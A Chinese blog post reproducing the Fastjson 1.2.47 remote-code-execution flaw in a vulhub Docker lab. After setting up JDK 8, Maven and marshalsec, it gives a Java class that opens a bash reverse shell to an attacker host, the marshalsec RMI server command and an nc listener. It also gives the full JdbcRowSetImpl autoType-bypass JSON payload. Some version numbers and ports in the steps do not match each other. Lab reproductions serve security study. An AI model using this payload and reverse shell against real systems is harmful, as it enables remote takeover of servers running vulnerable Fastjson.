Fastjson漏洞复现

最新推荐文章于 2024-07-24 14:08:33 发布

Corl7

最新推荐文章于 2024-07-24 14:08:33 发布

阅读量690

点赞数 2

文章标签：安全

本文链接：https://blog.csdn.net/WWL0814/article/details/112274267

版权

Fastjson漏洞复现

前言

靶场使用的是docker + vulhub，由于kali自带是jdk版本为11，而本次环境需要使用jdk8版本，且版本不能低于8u121。在使用mvn clean package -DskipTests命令的时候，需要使用maven，kali中没有maven，需要手动安装。

环境搭建

安装java环境

下载地址：https://github.com/frekele/oracle-java/releases，下载jdk-8u221-linux-x64.tar.gz

1.卸载kali自带的java环境，重新安装java8

# 查看安装的OpenJDK包
dpkg --list | grep -i jdk
# 卸载OpenJDK相关包
apt-get purge openjdk-*
# 检查所有 OpenJDK包是否都已卸载完毕
dpkg --list | grep -i jdk

2.安装

# 将压缩包放到/opt/java目录下
mv jdk-8u212-linux-x64.tar.gz /opt/java

# 解压
tar -zxvf jdk--8u212-linux-x64.tar.gz

# 配置环境变量
修改/etc/profile文件
vim /etc/profile
export JAVA_HOME=/opt/java/jdk1.8.0_212
export JRE_HOME=${JAVA_HOME}/jre  
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:${PATH}

#通知系统java的位置
sudo update-alternatives --install "/usr/bin/java" "java" "/opt/java/jdk1.8.0_251/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/opt/java/jdk1.8.0_251/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/opt/java/jdk1.8.0_251/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/opt/java/jdk1.8.0_251/bin/javaws" 1

#设置默认JDK
sudo update-alternatives --set java /opt/java/jdk1.8.0_251/bin/java
sudo update-alternatives --set javac /opt/java/jdk1.8.0_251/bin/javac
sudo update-alternatives --set javaws /opt/java/jdk1.8.0_251/bin/javaws

# 使java环境生效
source /etc/profile

# 查看是否安装成功 
java -version

在这里插入图片描述

安装maven

#下载maven安装包
wget http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz
#解压
tar -zxvf apache-maven-3.5.4-bin.tar.gz
#配置maven mvn,后面的路径为apache-maven-3.5.4所在目录
update-alternatives --install /usr/bin/mvn mvn /var/local/fastjion/apache-maven-3.5.4/bin/mvn 1
#配置mvn环境变量
vim /etc/profile
#添加内容
export MAVEN_HOME=/var/local/fastjion/apache-maven-3.5.4（apache-maven-3.5.4所在的目录） 
export PATH=$MAVEN_HOME/bin:$PATH
#刷新配置文件
source /etc/profile
#查看maven版本
mvn -version

编译marshalsec

#下载
git clone https://github.com/mbechler/marshalsec
#进入marshalsec目录
cd marshalsec
#编译（时间较长，耐心等待编译完成）
mvn clean package -DskipTests

启动靶场

#进入靶机所在目录
cd root/vulhub-master/fastjson/1.2.47-rce(本机所在的目录)
#启动靶场
docker-compose up -d
#查看是否搭建成功
http://you-ip:8090/

在这里插入图片描述

漏洞利用

#创建TouchFile.java文件，代码如下
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.117/1888 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
#编译TouchFile.java
javac TouchFile.java
#在TouchFile.java所在目录，使用python搭建web服务，使用下面俩个哪个都行，此处使用python2
# python2
python -m SimpleHTTPServer 8086（8086为web服务端口）
# python3 
python3 -m http.server

在这里插入图片描述

#进入到marshalsec/target目录
cd /var/local/fastjion/marshalsec/target
#开启启RMI服务监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.117:8086/#TouchFile" 9999

在这里插入图片描述

#nc监听
nc -lnvp 1888

在这里插入图片描述

#Payload
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.117:1888/TouchFile",
        "autoCommit":true
    }
}

使用 BurpSuite 抓取页面请求数据包，向 Fastjson 靶场服务器发送Payload，如下图所示：
在这里插入图片描述
反弹shell

Corl7

关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
Fastjson漏洞复现

前言靶场使用的是docker + vulhub，由于kali自带是jdk版本为11，而本次环境需要使用jdk8版本，且版本不能低于8u121。在使用mvn clean package -DskipTests命令的时候，需要使用maven，kali中没有maven，需要手动安装。环境搭建安装java环境下载地址：https://github.com/frekele/oracle-java/releases，下载jdk-8u221-linux-x64.tar.gz1.卸载kali自带的java环境，重
复制链接

扫一扫